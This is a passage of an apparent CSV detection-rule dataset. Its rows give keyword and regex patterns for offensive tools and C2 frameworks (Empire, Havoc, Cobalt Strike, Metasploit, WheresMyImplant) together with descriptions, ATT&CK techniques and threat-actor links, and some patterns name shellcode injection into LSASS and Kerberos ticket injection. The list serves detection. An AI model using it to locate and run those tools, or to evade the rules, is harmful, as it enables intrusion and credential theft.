Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","48537" "*Injecting shellcode into the running PowerShell process*",".{0,1000}Injecting\sshellcode\sinto\sthe\srunning\sPowerShell\sprocess.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","48538" "*Injection done! Check your listener!*",".{0,1000}Injection\sdone!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","48539" "*Injection* -ProcName lsass*",".{0,1000}Injection.{0,1000}\s\-ProcName\slsass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48540" "*Injection\Spawn32*",".{0,1000}Injection\\Spawn32.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48541" 
"*Injection\Spawn64*",".{0,1000}Injection\\Spawn64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48542" "*Injection-Exploit-1.0-SNAPSHOT-all.jar*",".{0,1000}Injection\-Exploit\-1\.0\-SNAPSHOT\-all\.jar.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","48543" "*Injections/Traversal.txt*",".{0,1000}Injections\/Traversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","48544" "*Injections/XSS.txt*",".{0,1000}Injections\/XSS\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","48545" "*InjectLibraryClient.exe 
-*",".{0,1000}InjectLibraryClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","48546" "*InjectLibraryDrv_x64.sys*",".{0,1000}InjectLibraryDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","48547" "*Inject-LocalShellcode*",".{0,1000}Inject\-LocalShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48548" "*InjectMate.py*",".{0,1000}InjectMate\.py.{0,1000}","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. 
and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","48549" "*InjectMateCommunity.py*",".{0,1000}InjectMateCommunity\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","48550" "*Inject-NetRipper*",".{0,1000}Inject\-NetRipper.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48551" "*Injector.exe*",".{0,1000}Injector\.exe.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","N/A","3","241","85","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z","48552" "*injector.ps1*.kirbi*",".{0,1000}injector\.ps1.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using 
Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","48553" "*InjectPERemote.cs*",".{0,1000}InjectPERemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48554" "*InjectPEWMIFSRemote*",".{0,1000}InjectPEWMIFSRemote.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48555" "*injectremote.boo*",".{0,1000}injectremote\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48556" "*Inject-RemoteShellcode *",".{0,1000}Inject\-RemoteShellcode\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - 
TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48557" "*Inject-RemoteShellcode*",".{0,1000}Inject\-RemoteShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik 
Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48558" "*inject-shellcode *",".{0,1000}inject\-shellcode\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48559" "*injectShellcode*",".{0,1000}injectShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","48560" "*InjectShellcode*",".{0,1000}InjectShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","48561" 
"*InjectShellCode.cs*",".{0,1000}InjectShellCode\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48562" "*InjectShellCodeRemote.cs*",".{0,1000}InjectShellCodeRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48563" "*InjectShellCodeWMIFSB64*",".{0,1000}InjectShellCodeWMIFSB64.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48564" "*injectsu.dll*",".{0,1000}injectsu\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48565" "*InjectTicket*ptt /ticket:*",".{0,1000}InjectTicket.{0,1000}ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","48566" "*inline_assembly -Assembly *",".{0,1000}inline_assembly\s\-Assembly\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","48568" "*InlineAssembly(""Plugins\\Scheduled.exe*",".{0,1000}InlineAssembly\(\""Plugins\\\\Scheduled\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person 
collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#content","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","48569" "*inlineAssembly*/execmethod*",".{0,1000}inlineAssembly.{0,1000}\/execmethod.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","48570" "*inlineDll*/dll*",".{0,1000}inlineDll.{0,1000}\/dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","48571" "*inline-exec.py*",".{0,1000}inline\-exec\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","48572" "*inline-execute *",".{0,1000}inline\-execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - 